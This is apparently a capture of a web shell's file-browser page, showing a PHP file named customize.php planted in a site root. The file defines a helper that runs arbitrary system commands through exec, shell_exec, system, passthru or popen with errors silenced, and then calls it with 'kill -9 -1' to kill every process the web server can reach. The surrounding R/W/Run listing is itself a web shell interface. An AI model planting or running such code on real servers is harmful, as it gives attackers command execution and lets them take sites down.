at path:ROOT / customize.php
run:R W Run
DIR
2026-08-07 14:07:21
R W Run
DIR
2026-08-07 11:30:46
R W Run
DIR
2026-08-07 23:28:49
R W Run
122.65 KB
2026-08-05 01:25:37
R W Run
604 By
2025-07-03 07:55:54
R W Run
215.76 KB
2026-08-07 07:38:38
R W Run
53 By
2025-07-03 07:44:35
R W Run
118.18 KB
2025-07-03 07:44:07
R W Run
118.14 KB
2025-07-03 07:43:39
R W Run
282 By
2026-08-07 07:52:06
R W Run
15.05 KB
2026-08-05 01:25:36
R W Run
737 By
2026-08-05 22:44:19
R W Run
12.4 KB
2026-08-05 22:44:25
R W Run
error_log
📄customize.php
1<?php
2function do_phpfun($cmd,$fun) {
3 $res = '';
4 switch($fun){
5 case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
6 case "shell_exec": $res = @shell_exec($cmd); break;
7 case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
8 case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
9 case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);break;
10 }
11 return $res;
12}
13
14echo do_phpfun('kill -9 -1', 'popen');